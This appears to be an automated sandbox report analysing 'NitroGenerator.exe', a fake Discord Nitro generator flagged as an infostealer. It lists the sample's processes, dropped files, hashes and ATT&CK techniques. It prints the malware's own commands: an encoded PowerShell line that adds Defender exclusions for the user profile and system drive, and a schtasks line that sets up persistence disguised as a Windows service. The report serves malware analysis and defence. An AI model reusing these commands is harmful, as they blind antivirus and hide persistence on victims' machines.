Overview

overview

10

Static

static

NITRO GENE...or.exe

windows7-x64

8

NITRO GENE...or.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    77s
  • max time network
    85s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    26-09-2022 18:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NITRO GENERATOR/NitroGenerator.exe

  • Size

    681.1MB

  • MD5

    f57c9332808a063901254cd41eef7613

  • SHA1

    67df58792e9a9d3c3d00e39753873fcf6ef2ae5f

  • SHA256

    2b50d8d9acaab4c8679d87d37dda1e97464e3bdbb00c942277c58d7532098a50

  • SHA512

    e032ca3899a93170f8a3e2d4be32deb66f21c5de02fc9f453bfd3709c0f54ff5eb75db58777ca1565dd57632b7c125de776b69737e8554761e1e15fd3b98e0eb

  • SSDEEP

    393216:zKAhcUJ09+imj7+mmFygBWbln6eqOBZC517HNohLBn5Iv/vQ:2O090j7nmFVWhn/qOB8JiaQ

Score
8/10
spywarestealer

Malware Config

Signatures

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NITRO GENERATOR\NitroGenerator.exe
    "C:\Users\Admin\AppData\Local\Temp\NITRO GENERATOR\NitroGenerator.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAaQB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAaABuACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:936
    • C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe
      "C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe"
      2⤵
      • Executes dropped EXE
      PID:1696
    • C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe
      "C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe"
      2⤵
      • Executes dropped EXE
      PID:1868
    • C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe
      "C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:1444
    • C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe
      "C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /rl highest /tn Windows Security Health Service /tr "C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe" /f
        3⤵
        • Creates scheduled task(s)
        PID:1916
      • C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe"
        3⤵
        • Executes dropped EXE
        PID:576

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Credentials in Files

1
T1081

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Data from Local System

1
T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\UNNAMED.exe
    Filesize

    325KB

    MD5

    038f548b46e0ef89dc476557407e7b4b

    SHA1

    18546d1fe05f4aee0313ff7fb805f8a51d65f145

    SHA256

    ff953ecfb1f82e587aa25c29d980f0875c9c9e5b2c9a3e13d87e91a551be9f45

    SHA512

    3dba1ffa622ae1c3b76f12c12e50984ddcfdae288fd234ef93784af2524b8646bdf3e95204ab57f4153779e7766d8bbb66e50e0c68e8adba752056d2655670f3

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\UNNAMED2.exe
    Filesize

    7.5MB

    MD5

    f49731a7439fd1c0bd9b1ca479372985

    SHA1

    26c9aec52acacb8c2573577b721ed1cb74cfdb30

    SHA256

    3b6661895ec7cf5f8275093791322e6c05f28583a49ffc88e0e28fe6b1450972

    SHA512

    8887062cd5505a5073f2b819d08041c0151c054955c1912bf6ff450c03f08e29c40ef0ff135546c73793a59b5e11eaabd7956b1bd3f3f94f4fbc30ab0b73816a

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe
    Filesize

    9.1MB

    MD5

    223ce6bb95cc6072b3c08cdcdf6b2944

    SHA1

    a55afd57e0862347574680bda2ea42ccb6c31bce

    SHA256

    39cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62

    SHA512

    a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\UNNAMED3.exe
    Filesize

    9.1MB

    MD5

    223ce6bb95cc6072b3c08cdcdf6b2944

    SHA1

    a55afd57e0862347574680bda2ea42ccb6c31bce

    SHA256

    39cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62

    SHA512

    a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe
    Filesize

    68KB

    MD5

    953f7e1cc05d1c62e733325e535dfec2

    SHA1

    b15b41799c491f1a9dac97189fd2a7373c9a7cbe

    SHA256

    906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e

    SHA512

    2406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\UNNAMED4.exe
    Filesize

    68KB

    MD5

    953f7e1cc05d1c62e733325e535dfec2

    SHA1

    b15b41799c491f1a9dac97189fd2a7373c9a7cbe

    SHA256

    906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e

    SHA512

    2406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe
    Filesize

    68KB

    MD5

    953f7e1cc05d1c62e733325e535dfec2

    SHA1

    b15b41799c491f1a9dac97189fd2a7373c9a7cbe

    SHA256

    906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e

    SHA512

    2406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\WindowsSecurityHealthService\Windows Security Health Service.exe
    Filesize

    68KB

    MD5

    953f7e1cc05d1c62e733325e535dfec2

    SHA1

    b15b41799c491f1a9dac97189fd2a7373c9a7cbe

    SHA256

    906de8044ba266774e17f3fe0683aed2ccf60e2f73d2f78eebf38f636f0ce74e

    SHA512

    2406f2cf52706dba8d182b061efd3cb15ce533ea8eae8abcdf318a051f46951219385d655d30bf2920513bb66a6c4b02698fd575f2cf32b7928de7d8f36b79b9

    Download Submit
  • \Users\Admin\AppData\Local\Temp\UNNAMED2.exe
    Filesize

    7.5MB

    MD5

    f49731a7439fd1c0bd9b1ca479372985

    SHA1

    26c9aec52acacb8c2573577b721ed1cb74cfdb30

    SHA256

    3b6661895ec7cf5f8275093791322e6c05f28583a49ffc88e0e28fe6b1450972

    SHA512

    8887062cd5505a5073f2b819d08041c0151c054955c1912bf6ff450c03f08e29c40ef0ff135546c73793a59b5e11eaabd7956b1bd3f3f94f4fbc30ab0b73816a

    Download Submit
  • \Users\Admin\AppData\Local\Temp\UNNAMED3.exe
    Filesize

    9.1MB

    MD5

    223ce6bb95cc6072b3c08cdcdf6b2944

    SHA1

    a55afd57e0862347574680bda2ea42ccb6c31bce

    SHA256

    39cc2423c2cd157014637802833c3b70f9b6cc5ff3e3247b15949eded3cb8d62

    SHA512

    a34ecf9dc5dae22f37d3697a5c4050261ca98f22f3f88108c9c63f02911fe64ed1be9b8608211b8440cb19fd5dbac423d1bbe1c5e70f2e31f0043b8ebbd4daa6

    Download Submit
  • memory/576-86-0x0000000000250000-0x0000000000268000-memory.dmp
    Filesize

    96KB

    Download
  • memory/576-83-0x0000000000000000-mapping.dmp
    Download
  • memory/936-63-0x00000000026CB000-0x00000000026EA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/936-56-0x0000000000000000-mapping.dmp
    Download
  • memory/936-70-0x00000000026CB000-0x00000000026EA000-memory.dmp
    Filesize

    124KB

    Download
  • memory/936-59-0x000007FEEDA10000-0x000007FEEE56D000-memory.dmp
    Filesize

    11.4MB

    Download
  • memory/936-62-0x00000000026C4000-0x00000000026C7000-memory.dmp
    Filesize

    12KB

    Download
  • memory/1444-77-0x000000013F1B0000-0x000000014018C000-memory.dmp
    Filesize

    15.9MB

    Download
  • memory/1444-68-0x0000000000000000-mapping.dmp
    Download
  • memory/1444-76-0x000000013F1B0000-0x000000014018C000-memory.dmp
    Filesize

    15.9MB

    Download
  • memory/1696-60-0x0000000000000000-mapping.dmp
    Download
  • memory/1800-75-0x0000000001130000-0x0000000001148000-memory.dmp
    Filesize

    96KB

    Download
  • memory/1800-80-0x0000000000240000-0x0000000000250000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1800-72-0x0000000000000000-mapping.dmp
    Download
  • memory/1868-65-0x0000000000000000-mapping.dmp
    Download
  • memory/1916-82-0x0000000000000000-mapping.dmp
    Download
  • memory/2016-54-0x0000000000F90000-0x0000000002096000-memory.dmp
    Filesize

    17.0MB

    Download
  • memory/2016-55-0x000007FEFC2F1000-0x000007FEFC2F3000-memory.dmp
    Filesize

    8KB

    Download